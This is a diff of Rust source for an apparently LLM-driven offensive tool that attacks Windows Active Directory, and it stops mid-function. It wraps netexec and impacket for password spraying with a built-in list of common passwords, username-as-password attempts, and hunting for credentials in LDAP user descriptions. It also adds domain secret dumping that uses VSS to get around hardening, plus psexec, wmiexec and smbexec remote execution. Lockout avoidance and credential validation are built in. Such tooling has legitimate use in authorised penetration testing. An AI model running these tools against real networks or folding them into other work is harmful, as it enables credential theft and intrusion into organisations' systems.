23b6d1e4..cb6b2765 100644 --- a/ares-tools/src/credential_access/misc.rs +++ b/ares-tools/src/credential_access/misc.rs @@ -3,6 +3,7 @@ //! password policy, password spray, username-as-password, credman, autologon). use anyhow::Result; +use ares_core::models::is_always_disabled_account; use serde_json::Value; use crate::args::{optional_bool, optional_i64, optional_str, required_str}; @@ -10,6 +11,42 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Read a caller-supplied users wordlist and return a sanitized temp-file path +/// with AD built-in always-disabled accounts (Guest, krbtgt, DefaultAccount, +/// WDAGUtilityAccount) stripped. Returns `(sanitized_path, owns_temp)` where +/// `owns_temp` indicates the caller must delete the path on exit. +/// +/// If the file can't be read or no entries are filtered, the original path is +/// returned unchanged so callers don't pay the rewrite cost. +fn sanitize_spray_userlist(users_file: &str) -> (String, bool) { + let Ok(contents) = std::fs::read_to_string(users_file) else { + return (users_file.to_string(), false); + }; + let mut filtered_any = false; + let kept: Vec<&str> = contents + .lines() + .filter(|line| { + let user = line.trim(); + if user.is_empty() { + return true; + } + if is_always_disabled_account(user) { + filtered_any = true; + return false; + } + true + }) + .collect(); + if !filtered_any { + return (users_file.to_string(), false); + } + let tmp = format!("/tmp/spray_users_filtered_{}.txt", std::process::id()); + if std::fs::write(&tmp, kept.join("\n")).is_err() { + return (users_file.to_string(), false); + } + (tmp, true) +} + /// Minimum jitter (seconds) between spray attempts when caller does not /// supply `delay_seconds`. Keeps at least a small gap between authentication /// attempts so logon spikes do not all land in the same observation window. @@ -50,7 +87,31 @@ pub async fn lsassy(args: &Value) -> Result { cmd.timeout_secs(120).execute().await } -/// Check for admin access on targets via `netexec smb --admin-status`. +/// Check a single credential against SMB on a target via `netexec smb`. +/// +/// Returns standard netexec output — look for `[+]` (valid cred) and +/// `(Pwn3d!)` (local admin). +pub async fn smb_login_check(args: &Value) -> Result { + let target = required_str(args, "target")?; + let username = required_str(args, "username")?; + let password = required_str(args, "password")?; + let domain = required_str(args, "domain")?; + + let cred_args = credentials::netexec_creds(Some(username), Some(password), None, Some(domain)); + + CommandBuilder::new("netexec") + .arg("smb") + .arg(target) + .args(cred_args) + .timeout_secs(60) + .execute() + .await +} + +/// Check for admin access on targets via `netexec smb`. +/// +/// netexec automatically reports `(Pwn3d!)` in its output when the +/// credential has local admin access — no extra flag needed. pub async fn domain_admin_checker(args: &Value) -> Result { let targets = required_str(args, "targets")?; let username = optional_str(args, "username"); @@ -64,7 +125,6 @@ pub async fn domain_admin_checker(args: &Value) -> Result { .arg("smb") .arg(targets) .args(cred_args) - .arg("--admin-status") .timeout_secs(120) .execute() .await @@ -140,14 +200,20 @@ pub async fn laps_dump(args: &Value) -> Result { } /// Search for user descriptions containing credentials via `ldapsearch`. +/// +/// `domain` controls the base DN (the partition being searched). +/// `bind_domain` (optional) overrides the domain in the bind DN +/// (`user@bind_domain`). Use when the credential belongs to a different +/// domain than the one being queried. Defaults to `domain`. pub async fn ldap_search_descriptions(args: &Value) -> Result { let target = required_str(args, "target")?; - let username = required_str(args, "username")?; - let password = required_str(args, "password")?; let domain = required_str(args, "domain")?; + let username = optional_str(args, "username"); + let password = optional_str(args, "password"); + let bind_domain = optional_str(args, "bind_domain"); let base_dn = optional_str(args, "base_dn"); + let ticket_path = optional_str(args, "ticket_path"); - // Build base DN from domain if not explicitly provided. let computed_base_dn = match base_dn { Some(dn) => dn.to_string(), None => domain @@ -157,20 +223,27 @@ pub async fn ldap_search_descriptions(args: &Value) -> Result { .join(","), }; - let bind_dn = format!("{username}@{domain}"); let ldap_uri = format!("ldap://{target}"); - CommandBuilder::new("ldapsearch") - .arg("-x") + let mut cmd = CommandBuilder::new("ldapsearch") .flag("-H", &ldap_uri) - .flag("-D", &bind_dn) - .flag("-w", password) - .flag("-b", &computed_base_dn) + .timeout_secs(120); + + if let Some(ccache) = ticket_path { + cmd = cmd.env("KRB5CCNAME", ccache).arg("-Y").arg("GSSAPI"); + } else { + let u = username.ok_or_else(|| anyhow::anyhow!("missing required arg: username"))?; + let p = password.ok_or_else(|| anyhow::anyhow!("missing required arg: password"))?; + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{u}@{auth_domain}"); + cmd = cmd.arg("-x").flag("-D", &bind_dn).flag("-w", p); + } + + cmd.flag("-b", &computed_base_dn) .arg("(&(objectClass=user)(description=*))") .arg("sAMAccountName") .arg("description") .arg("userPrincipalName") - .timeout_secs(120) .execute() .await } @@ -374,7 +447,8 @@ pub async fn password_policy(args: &Value) -> Result { pub async fn password_spray(args: &Value) -> Result { let target = required_str(args, "target")?; let users_file = optional_str(args, "users_file"); - let password = required_str(args, "password")?; + let password = optional_str(args, "password"); + let use_common_passwords = optional_bool(args, "use_common_passwords").unwrap_or(false); let domain = required_str(args, "domain")?; let delay_seconds = optional_i64(args, "delay_seconds"); let lockout_threshold = optional_i64(args, "lockout_threshold"); @@ -387,17 +461,33 @@ pub async fn password_spray(args: &Value) -> Result { return Ok(refusal); } - // Use provided file or generate a default wordlist + // Use provided file or generate a default wordlist. When the caller + // supplies a users_file, strip AD built-in always-disabled accounts so + // we don't burn badPwdCount budget on Guest et al. let tmp_file; + let mut owns_filtered = false; let wordlist_path = if let Some(uf) = users_file { - uf.to_string() + let (path, owns) = sanitize_spray_userlist(uf); + owns_filtered = owns; + path } else { tmp_file = format!("/tmp/spray_pw_{}.txt", std::process::id()); std::fs::write(&tmp_file, DEFAULT_SPRAY_USERNAMES)?; tmp_file }; - let cred_args = credentials::netexec_creds(None, Some(password), None, Some(domain)); + let tmp_password_file; + let password_arg = match (password, use_common_passwords) { + (Some(p), _) => p.to_string(), + (None, true) => { + tmp_password_file = format!("/tmp/spray_pwlist_{}.txt", std::process::id()); + std::fs::write(&tmp_password_file, DEFAULT_SPRAY_PASSWORDS)?; + tmp_password_file + } + (None, false) => anyhow::bail!( + "password_spray requires either 'password' or 'use_common_passwords=true'" + ), + }; let jitter = delay_seconds .unwrap_or(SPRAY_DEFAULT_JITTER_SECS) @@ -407,7 +497,8 @@ pub async fn password_spray(args: &Value) -> Result { .arg("smb") .arg(target) .flag("-u", &wordlist_path) - .args(cred_args) + .flag("-p", &password_arg) + .flag("-d", domain) .arg("--continue-on-success") .flag("--jitter", &jitter) .timeout_secs(300) @@ -415,9 +506,12 @@ pub async fn password_spray(args: &Value) -> Result { .await; // Clean up temp file if we created one - if users_file.is_none() { + if users_file.is_none() || owns_filtered { let _ = std::fs::remove_file(&wordlist_path); } + if password.is_none() && use_common_passwords { + let _ = std::fs::remove_file(&password_arg); + } result } @@ -468,8 +562,12 @@ fn spray_refusal(message: String) -> ToolOutput { } /// Common AD usernames for fallback when no users_file is provided. +/// +/// `guest`, `defaultaccount`, `wdagutilityaccount`, `krbtgt` are intentionally +/// excluded — they ship `userAccountControl & ACCOUNTDISABLE` set, so spraying +/// them never succeeds and just bumps badPwdCount on shared lockout policies. const DEFAULT_SPRAY_USERNAMES: &str = "\ -Administrator\nadmin\nguest\n\ +Administrator\nadmin\n\ sql_svc\nsvc_sql\nsqlservice\nsvc_mssql\n\ svc_backup\nbackup\n\ svc_web\nwebservice\n\ @@ -491,22 +589,62 @@ sql_admin\ndb_admin\n\ webadmin\nnetadmin\n\ helpdesk\nsupport\nservice\n"; +/// Common AD passwords for fallback low-and-slow spraying when the orchestrator +/// explicitly requests a common-password pass instead of a single known value. +const DEFAULT_SPRAY_PASSWORDS: &str = "\ +Password123!\n\ +Welcome1\n\ +Welcome123\n\ +Summer2024!\n\ +Summer2025!\n\ +Winter2024!\n\ +Winter2025!\n\ +Spring2025!\n\ +Autumn2025!\n\ +Company123!\n\ +Changeme123!\n\ +P@ssw0rd\n\ +P@ssw0rd!\n\ +Password1\n"; + /// Test each username as its own password via `netexec smb --no-bruteforce`. +/// +/// `excluded_users` (optional) is a comma- or whitespace-separated list of +/// usernames the orchestrator already saw locked out. They are dropped from +/// the wordlist before netexec runs so a re-spray doesn't keep pinging an +/// already-locked principal (each ping bumps badPwdCount and prolongs the +/// AD lockout window). pub async fn username_as_password(args: &Value) -> Result { let target = required_str(args, "target")?; let users_file = optional_str(args, "users_file"); let domain = required_str(args, "domain")?; + let excluded_users = optional_str(args, "excluded_users").unwrap_or(""); - // Use provided file or generate a default wordlist + // Use provided file or generate a default wordlist. Caller-supplied + // wordlists are filtered to drop AD built-in always-disabled accounts so + // we don't waste badPwdCount budget on Guest et al. let tmp_file; - let wordlist_path = if let Some(uf) = users_file { - uf.to_string() + let mut owns_filtered = false; + let mut wordlist_path = if let Some(uf) = users_file { + let (path, owns) = sanitize_spray_userlist(uf); + owns_filtered = owns; + path } else { tmp_file = format!("/tmp/spray_users_{}.txt", std::process::id()); std::fs::write(&tmp_file, DEFAULT_SPRAY_USERNAMES)?; tmp_file }; + // Drop any usernames the orchestrator already observed locked out. + let (after_excl, owns_excluded) = drop_excluded_users(&wordlist_path, excluded_users); + if owns_excluded { + if owns_filtered { + let _ = std::fs::remove_file(&wordlist_path); + } + wordlist_path = after_excl; + owns_filtered = true; + } + let result = CommandBuilder::new("netexec") .arg("smb") .arg(target) @@ -519,14 +657,61 @@ pub async fn username_as_password(args: &Value) -> Result { .execute() .await; - // Clean up temp file if we created one - if users_file.is_none() { + // Clean up temp file if we created one (default fallback or filtered copy) + if users_file.is_none() || owns_filtered { let _ = std::fs::remove_file(&wordlist_path); } result } +/// Drop usernames listed in `excluded_users` (comma/whitespace separated) +/// from the wordlist at `path`. Returns `(path_to_use, owns_new_file)`. +/// Case-insensitive match; preserves original line order. If `excluded_users` +/// is empty or no entries match, returns the input path unchanged. +fn drop_excluded_users(path: &str, excluded_users: &str) -> (String, bool) { + let excluded: std::collections::HashSet = excluded_users + .split(|c: char| c == ',' || c.is_whitespace()) + .filter(|s| !s.is_empty()) + .map(|s| s.to_lowercase()) + .collect(); + if excluded.is_empty() { + return (path.to_string(), false); + } + let Ok(contents) = std::fs::read_to_string(path) else { + return (path.to_string(), false); + }; + let mut filtered_any = false; + let kept: Vec<&str> = contents + .lines() + .filter(|line| { + let trimmed = line.trim(); + if trimmed.is_empty() { + return true; + } + if excluded.contains(&trimmed.to_lowercase()) { + filtered_any = true; + return false; + } + true + }) + .collect(); + if !filtered_any { + return (path.to_string(), false); + } + // Make the temp filename unique per call: parallel callers (and parallel + // unit tests) share the process and would otherwise overwrite each other. + let nanos = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_nanos()) + .unwrap_or(0); + let tmp = format!("/tmp/spray_users_excl_{}_{}.txt", std::process::id(), nanos); + if std::fs::write(&tmp, kept.join("\n")).is_err() { + return (path.to_string(), false); + } + (tmp, true) +} + /// Enumerate Credential Manager entries via `netexec smb -x "cmdkey /list"`. pub async fn check_credman_entries(args: &Value) -> Result { let target = required_str(args, "target")?; @@ -573,6 +758,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- lsassy hash formatting --- + #[test] fn lsassy_hash_without_colon_gets_prefix() { let hash = "aabbccdd"; @@ -623,6 +810,8 @@ mod tests { assert!(optional_str(&args, "method").is_none()); } + // --- ldap_search_descriptions --- + #[test] fn base_dn_computation_from_domain() { let domain = "contoso.local"; @@ -689,6 +878,8 @@ mod tests { assert!(required_str(&args, "domain").is_ok()); } + // --- netexec_creds helper --- + #[test] fn netexec_creds_for_domain_admin_checker() { let cred_args = @@ -719,6 +910,8 @@ mod tests { assert!(required_str(&args, "targets").is_err()); } + // --- gpp_password_finder --- + #[test] fn gpp_password_finder_all_required() { let args = json!({ @@ -733,6 +926,8 @@ mod tests { assert!(required_str(&args, "domain").is_ok()); } + // --- DEFAULT_SPRAY_USERNAMES --- + #[test] fn default_spray_usernames_is_non_empty() { assert!(!super::DEFAULT_SPRAY_USERNAMES.is_empty()); @@ -749,6 +944,23 @@ mod tests { assert!(super::DEFAULT_SPRAY_USERNAMES.contains("svc_backup")); } + #[test] + fn default_spray_usernames_excludes_disabled_builtins() { + let entries: Vec<&str> = super::DEFAULT_SPRAY_USERNAMES + .lines() + .map(|l| l.trim()) + .filter(|l| !l.is_empty()) + .collect(); + for disabled in ["guest", "krbtgt", "defaultaccount", "wdagutilityaccount"] { + assert!( + !entries.iter().any(|e| e.eq_ignore_ascii_case(disabled)), + "disabled built-in {disabled} must not appear in default spray wordlist" + ); + } + } + + // --- password_spray --- + #[test] fn password_spray_delay_seconds_parsing() { let args = json!({ @@ -788,6 +1000,8 @@ mod tests { assert!(required_str(&args, "domain").is_err()); } + // --- ntds_dit_extract --- + #[test] fn ntds_dit_extract_auth_with_password() { let (auth_string, extra_args) = credentials::impacket_auth( @@ -814,6 +1028,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- smbclient_spider --- + #[test] fn smbclient_spider_optional_pattern() { let args = json!({ @@ -855,6 +1071,8 @@ mod tests { ); } + // --- check_credman_entries / check_autologon_registry --- + #[test] fn credman_requires_all_fields() { let args = json!({ @@ -881,6 +1099,8 @@ mod tests { assert_eq!(cred_args[5], "contoso.local"); } + // --- username_as_password --- + #[test] fn username_as_password_requires_target() { let args = json!({"domain": "contoso.local"}); @@ -903,6 +1123,8 @@ mod tests { assert_eq!(optional_str(&args, "users_file"), Some("/tmp/myusers.txt")); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] @@ -933,6 +1155,16 @@ mod tests { assert!(super::lsassy(&args).await.is_ok()); } + #[tokio::test] + async fn smb_login_check_executes() { + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.10", "username": "localuser", + "password": "localuser", "domain": "contoso.local" + }); + assert!(super::smb_login_check(&args).await.is_ok()); + } + #[tokio::test] async fn domain_admin_checker_executes() { mock::push(mock::success()); @@ -1150,6 +1382,78 @@ mod tests { assert!(super::check_spray_budget(Some(0), 100, false).is_none()); } + // --- sanitize_spray_userlist --- + + #[test] + fn sanitize_spray_userlist_strips_disabled_accounts() { + let pid = std::process::id(); + let src = format!("/tmp/sanitize_src_{pid}.txt"); + std::fs::write( + &src, + "Administrator\nGuest\nkrbtgt\njdoe\nDefaultAccount\nWDAGUtilityAccount\nsvc_sql\n", + ) + .unwrap(); + + let (path, owns) = super::sanitize_spray_userlist(&src); + assert!(owns, "filtered list should be in a freshly owned temp file"); + assert_ne!( + path, src, + "owned filter should not return the original path" + ); + + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("Administrator")); + assert!(filtered.contains("jdoe")); + assert!(filtered.contains("svc_sql")); + for disabled in ["Guest", "krbtgt", "DefaultAccount", "WDAGUtilityAccount"] { + assert!( + !filtered.lines().any(|l| l.trim() == disabled), + "{disabled} should be filtered out" + ); + } + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + + #[test] + fn sanitize_spray_userlist_passes_through_when_clean() { + let pid = std::process::id(); + let src = format!("/tmp/sanitize_clean_{pid}.txt"); + std::fs::write(&src, "Administrator\njdoe\nsvc_sql\n").unwrap(); + + let (path, owns) = super::sanitize_spray_userlist(&src); + assert!(!owns, "clean list should not be rewritten"); + assert_eq!(path, src, "clean list should return original path"); + + let _ = std::fs::remove_file(&src); + } + + #[test] + fn sanitize_spray_userlist_handles_missing_file() { + let path = "/tmp/sanitize_missing_does_not_exist.txt"; + let _ = std::fs::remove_file(path); + let (returned, owns) = super::sanitize_spray_userlist(path); + assert!(!owns); + assert_eq!(returned, path); + } + + #[test] + fn sanitize_spray_userlist_case_insensitive() { + let pid = std::process::id(); + let src = format!("/tmp/sanitize_case_{pid}.txt"); + std::fs::write(&src, "GUEST\nguest\nGuest\nadmin\n").unwrap(); + + let (path, owns) = super::sanitize_spray_userlist(&src); + assert!(owns); + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("admin")); + assert!(!filtered.to_lowercase().contains("guest")); + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + #[tokio::test] async fn username_as_password_with_file_executes() { mock::push(mock::success()); @@ -1160,6 +1464,69 @@ mod tests { assert!(super::username_as_password(&args).await.is_ok()); } + #[test] + fn drop_excluded_users_strips_listed_entries() { + let pid = std::process::id(); + let src = format!("/tmp/excl_src_{pid}.txt"); + std::fs::write(&src, "Administrator\ntestuser1\ntestuser2\nguest\n").unwrap(); + + let (path, owns) = super::drop_excluded_users(&src, "testuser1, guest"); + assert!(owns); + assert_ne!(path, src); + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("Administrator")); + assert!(filtered.contains("testuser2")); + assert!(!filtered + .lines() + .any(|l| l.trim().eq_ignore_ascii_case("testuser1"))); + assert!(!filtered.lines().any(|l| l.trim().eq_ignore_ascii_case("guest"))); + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + + #[test] + fn drop_excluded_users_empty_list_passes_through() { + let pid = std::process::id(); + let src = format!("/tmp/excl_empty_{pid}.txt"); + std::fs::write(&src, "Administrator\ntestuser1\n").unwrap(); + + let (path, owns) = super::drop_excluded_users(&src, ""); + assert!(!owns); + assert_eq!(path, src); + + let _ = std::fs::remove_file(&src); + } + + #[test] + fn drop_excluded_users_no_matches_passes_through() { + let pid = std::process::id(); + let src = format!("/tmp/excl_nomatch_{pid}.txt"); + std::fs::write(&src, "Administrator\ntestuser1\n").unwrap(); + + let (path, owns) = super::drop_excluded_users(&src, "testuser2,testuser3"); + assert!(!owns); + assert_eq!(path, src); + + let _ = std::fs::remove_file(&src); + } + + #[test] + fn drop_excluded_users_case_insensitive() { + let pid = std::process::id(); + let src = format!("/tmp/excl_case_{pid}.txt"); + std::fs::write(&src, "TESTUSER1\ntestuser1\nadmin\n").unwrap(); + + let (path, owns) = super::drop_excluded_users(&src, "testuser1"); + assert!(owns); + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("admin")); + assert!(!filtered.to_lowercase().contains("testuser1")); + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + #[tokio::test] async fn check_credman_entries_executes() { mock::push(mock::success()); diff --git a/ares-tools/src/credential_access/secretsdump.rs b/ares-tools/src/credential_access/secretsdump.rs index 5b2d1590..b55b505c 100644 --- a/ares-tools/src/credential_access/secretsdump.rs +++ b/ares-tools/src/credential_access/secretsdump.rs @@ -18,16 +18,30 @@ pub async fn secretsdump(args: &Value) -> Result { let dc_ip = optional_str(args, "dc_ip"); let use_kerberos = optional_bool(args, "no_pass").unwrap_or(false); let ticket_path = optional_str(args, "ticket_path"); + let just_dc_user = optional_str(args, "just_dc_user"); + let use_vss = optional_bool(args, "use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes"); let timeout_secs = timeout_minutes.map(|m| (m * 60) as u64).unwrap_or(180); + if !use_kerberos && password.is_none() && hash.is_none() { + anyhow::bail!( + "secretsdump requires password, hash, or no_pass+ticket_path. \ + None were provided for {username}@{} on {target} — credentials \ + must be present in operation state for the (username, domain) pair, \ + or the LLM must call this with no_pass=true and a valid Kerberos ticket. \ + Refusing to run because impacket would call getpass() and crash on no-TTY.", + domain.unwrap_or("(no domain)") + ); + } + let (auth_string, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); let mut cmd = CommandBuilder::new("impacket-secretsdump"); cmd = cmd.flag_opt("-dc-ip", dc_ip); + cmd = cmd.flag_opt("-just-dc-user", just_dc_user); if use_kerberos { cmd = cmd.arg("-k").arg("-no-pass"); @@ -38,6 +52,10 @@ pub async fn secretsdump(args: &Value) -> Result { cmd = cmd.args(extra_args); } + if use_vss { + cmd = cmd.arg("-use-vss"); + } + cmd = cmd.arg(&auth_string); cmd.timeout_secs(timeout_secs).execute().await @@ -160,6 +178,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.2")); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credentials.rs b/ares-tools/src/credentials.rs index 8bc12d33..9a88501d 100644 --- a/ares-tools/src/credentials.rs +++ b/ares-tools/src/credentials.rs @@ -1,3 +1,116 @@ +use anyhow::Result; +use serde_json::Value; + +/// Argument keys that hold secret material. Mirrors `CREDENTIAL_KEYS` in +/// `ares-cli/src/worker/credential_resolver.rs` — keep in sync. +/// +/// The LLM must never supply values for these keys; the worker resolver +/// injects them from operation state and strips placeholders. This list is +/// used by [`validate_arguments`] to fail dispatch loudly if a placeholder +/// somehow survives upstream stripping. +pub const CREDENTIAL_KEYS: &[&str] = &[ + "password", + "hash", + "hashes", + "nt_hash", + "nthash", + "ntlm_hash", + "lm_hash", + "aes_key", + "aesKey", + "aes256_key", + "ticket_path", + "krbtgt_hash", + "child_krbtgt_hash", + "parent_krbtgt_hash", + "trust_key", + "trust_aes_key", + "trust_hash", + "admin_hash", + "domain_sid", + "source_sid", + "target_sid", + "extra_sid", + "kerberos_keys", + "dpapi_key", + "pfx_password", + "coerce_password", + "coerce_hash", +]; + +/// Validate that no credential argument carries a placeholder/literal value. +/// +/// Defense-in-depth backstop for the worker credential resolver. The schema +/// strip in `ares-llm` keeps credential fields out of LLM tool calls, and +/// the worker resolver injects real values from operation state and strips +/// placeholders. If a placeholder still reaches dispatch, something upstream +/// is wrong — fail loudly rather than send `password='[TGT]'` to a subprocess. +pub fn validate_arguments(tool_name: &str, arguments: &Value) -> Result<()> { + let Some(obj) = arguments.as_object() else { + return Ok(()); + }; + for &key in CREDENTIAL_KEYS { + if let Some(v) = obj.get(key) { + if is_placeholder_value(v) { + anyhow::bail!( + "tool '{tool_name}' argument '{key}' has placeholder value {v} — \ + credentials must be resolved from operation state, not invented \ + by the LLM. Check the worker credential resolver and prompt templates." + ); + } + } + } + Ok(()) +} + +fn is_placeholder_value(v: &Value) -> bool { + match v { + Value::Null => true, + Value::String(s) => is_placeholder_str(s), + _ => false, + } +} + +fn is_placeholder_str(s: &str) -> bool { + let t = s.trim(); + if t.is_empty() { + return true; + } + if (t.starts_with('[') && t.ends_with(']')) || (t.starts_with('<') && t.ends_with('>')) { + return true; + } + let lower = t.to_ascii_lowercase(); + matches!( + lower.as_str(), + "n/a" + | "na" + | "null" + | "none" + | "nil" + | "unknown" + | "tbd" + | "todo" + | "password" + | "hash" + | "ntlm" + | "nthash" + | "tgt" + | "ticket" + | "ccache" + | "aes" + | "aes_key" + | "trust_key" + | "domain_sid" + | "krbtgt_hash" + | "placeholder" + | "" + | "" + | "" + | "" + | "" + ) +} + /// Build an impacket-style authentication target string. /// /// Format: `domain/username:password@target` or `username@target` (for hash auth). @@ -29,6 +142,15 @@ pub fn hash_args(hash: &str) -> Vec { vec!["-hashes".to_string(), h] } +/// Extract the NT hash from a hash string that may be in `LM:NT` colon form. +/// +/// `impacket-ticketer -nthash` rejects the concatenated `LM:NT` form with +/// `'Odd-length string'` because it expects a 32-char hex NT hash. This helper +/// returns the right-most colon-delimited segment, trimmed. +pub fn nt_hash_only(hash: &str) -> &str { + hash.rsplit(':').next().unwrap_or(hash).trim() +} + /// Build netexec-style credential args: `-u user -p pass -d domain` or `-u user -H hash`. pub fn netexec_creds( username: Option<&str>, @@ -140,6 +262,33 @@ mod tests { assert_eq!(args, vec!["-hashes", "aad3b435:aabbccdd"]); } + #[test] + fn nt_hash_only_strips_lm_half() { + assert_eq!( + nt_hash_only("aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_passes_through_plain_nt() { + assert_eq!( + nt_hash_only("d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_trims_whitespace() { + assert_eq!(nt_hash_only(" abcd "), "abcd"); + assert_eq!(nt_hash_only("aad3b435:abcd\n"), "abcd"); + } + + #[test] + fn nt_hash_only_empty_string() { + assert_eq!(nt_hash_only(""), ""); + } + #[test] fn netexec_creds_password_auth() { let args = netexec_creds(Some("admin"), Some("P@ss"), None, Some("CONTOSO")); @@ -230,4 +379,85 @@ mod tests { assert_eq!(key, "KRB5CCNAME"); assert_eq!(val, "/tmp/krb5cc_admin"); } + + #[test] + fn validate_arguments_passes_real_credentials() { + let args = serde_json::json!({ + "target": "192.168.58.10", + "username": "admin", + "password": "P@ssw0rd!", + "hash": "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", + "krbtgt_hash": "aad3b435b51404eeaad3b435b51404ee", + "ticket_path": "/tmp/admin.ccache", + "domain_sid": "S-1-5-21-1234-5678-9012", + }); + validate_arguments("secretsdump", &args).expect("real values must pass"); + } + + #[test] + fn validate_arguments_rejects_bracketed_placeholder() { + let args = serde_json::json!({ + "target": "dc01", + "password": "[TGT]", + }); + let err = validate_arguments("nmap_scan", &args).unwrap_err(); + let msg = err.to_string(); + assert!(msg.contains("password"), "{msg}"); + assert!(msg.contains("[TGT]"), "{msg}"); + assert!(msg.contains("nmap_scan"), "{msg}"); + } + + #[test] + fn validate_arguments_rejects_angle_placeholder() { + let args = serde_json::json!({ + "hash": "", + }); + let err = validate_arguments("generate_golden_ticket", &args).unwrap_err(); + assert!(err.to_string().contains("hash")); + } + + #[test] + fn validate_arguments_rejects_n_a_string() { + let args = serde_json::json!({"password": "N/A"}); + assert!(validate_arguments("psexec", &args).is_err()); + } + + #[test] + fn validate_arguments_rejects_null_value() { + let args = serde_json::json!({"trust_key": null}); + assert!(validate_arguments("create_inter_realm_ticket", &args).is_err()); + } + + #[test] + fn validate_arguments_rejects_bare_word_placeholder() { + let args = serde_json::json!({"krbtgt_hash": "HASH"}); + assert!(validate_arguments("generate_golden_ticket", &args).is_err()); + } + + #[test] + fn validate_arguments_rejects_empty_string() { + let args = serde_json::json!({"password": ""}); + assert!(validate_arguments("psexec", &args).is_err()); + } + + #[test] + fn validate_arguments_ignores_non_credential_keys() { + let args = serde_json::json!({ + "target": "", + "command": "[whoami]", + }); + validate_arguments("psexec", &args).expect("non-credential keys are not validated"); + } + + #[test] + fn validate_arguments_handles_non_object_arguments() { + let args = serde_json::json!("just a string"); + validate_arguments("any_tool", &args).expect("non-object arguments pass through"); + } + + #[test] + fn validate_arguments_handles_missing_credential_keys() { + let args = serde_json::json!({"target": "192.168.58.10"}); + validate_arguments("nmap_scan", &args).expect("absent keys are not validated"); + } } diff --git a/ares-tools/src/executor.rs b/ares-tools/src/executor.rs index 2cb3ff50..6ea89c77 100644 --- a/ares-tools/src/executor.rs +++ b/ares-tools/src/executor.rs @@ -15,6 +15,7 @@ pub struct CommandBuilder { env_vars: Vec<(String, String)>, timeout: Duration, stdin_data: Option, + cwd: Option, } impl CommandBuilder { @@ -25,6 +26,7 @@ impl CommandBuilder { env_vars: Vec::new(), timeout: DEFAULT_TIMEOUT, stdin_data: None, + cwd: None, } } @@ -79,6 +81,11 @@ impl CommandBuilder { self } + pub fn current_dir(mut self, dir: impl Into) -> Self { + self.cwd = Some(dir.into()); + self + } + pub async fn execute(self) -> Result { #[cfg(test)] { @@ -93,6 +100,10 @@ impl CommandBuilder { let mut cmd = Command::new(&self.program); cmd.args(&self.args); + if let Some(ref dir) = self.cwd { + cmd.current_dir(dir); + } + for (key, value) in &self.env_vars { cmd.env(key, value); } diff --git a/ares-tools/src/lateral/execution.rs b/ares-tools/src/lateral/execution.rs index 3e586d64..183d3dae 100644 --- a/ares-tools/src/lateral/execution.rs +++ b/ares-tools/src/lateral/execution.rs @@ -9,6 +9,29 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Reject calls that would land impacket in an interactive `getpass()` prompt. +/// Without password or hash, impacket asks the controlling TTY for a password +/// and crashes with EOFError when run from a non-interactive worker. +fn require_password_or_hash( + tool: &str, + username: &str, + domain: Option<&str>, + password: Option<&str>, + hash: Option<&str>, +) -> Result<()> { + if password.is_none() && hash.is_none() { + anyhow::bail!( + "{tool} requires a password or hash for {username}@{} but none was \ + supplied. Credentials must be present in operation state for the \ + (username, domain) pair so the resolver can inject them, or the \ + LLM must call the *_kerberos variant with a valid ticket. Refusing \ + to run because impacket would call getpass() and crash on no-TTY.", + domain.unwrap_or("(no domain)") + ); + } + Ok(()) +} + /// Execute a command on a remote host via impacket-psexec. /// /// Required args: `target`, `username` @@ -22,6 +45,8 @@ pub async fn psexec(args: &Value) -> Result { let command = optional_str(args, "command").unwrap_or(r#"cmd.exe /c "whoami && hostname && ipconfig""#); + require_password_or_hash("psexec", username, domain, password, hash)?; + let (auth_str, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); @@ -76,6 +101,8 @@ pub async fn wmiexec(args: &Value) -> Result { let domain = optional_str(args, "domain"); let command = optional_str(args, "command").unwrap_or("whoami"); + require_password_or_hash("wmiexec", username, domain, password, hash)?; + let (auth_str, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); @@ -129,6 +156,8 @@ pub async fn smbexec(args: &Value) -> Result { let domain = optional_str(args, "domain"); let command = optional_str(args, "command").unwrap_or("whoami"); + require_password_or_hash("smbexec", username, domain, password, hash)?; + let (auth_str, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); @@ -225,6 +254,7 @@ pub async fn xfreerdp(args: &Value) -> Result { cmd.arg("/cert-ignore") .arg("+auth-only") + .env("HOME", "/root") .timeout_secs(30) .execute() .await @@ -260,7 +290,9 @@ pub async fn ssh_with_password(args: &Value) -> Result { /// Dump secrets from a remote host via impacket-secretsdump with Kerberos auth. /// /// Required args: `target`, `username`, `domain`, `ticket_path` -/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes` +/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes`, +/// `just_dc_user` (single account, e.g. `krbtgt`), +/// `use_vss` (bool — use VSS method to bypass DRSUAPI hardening) pub async fn secretsdump_kerberos(args: &Value) -> Result { let 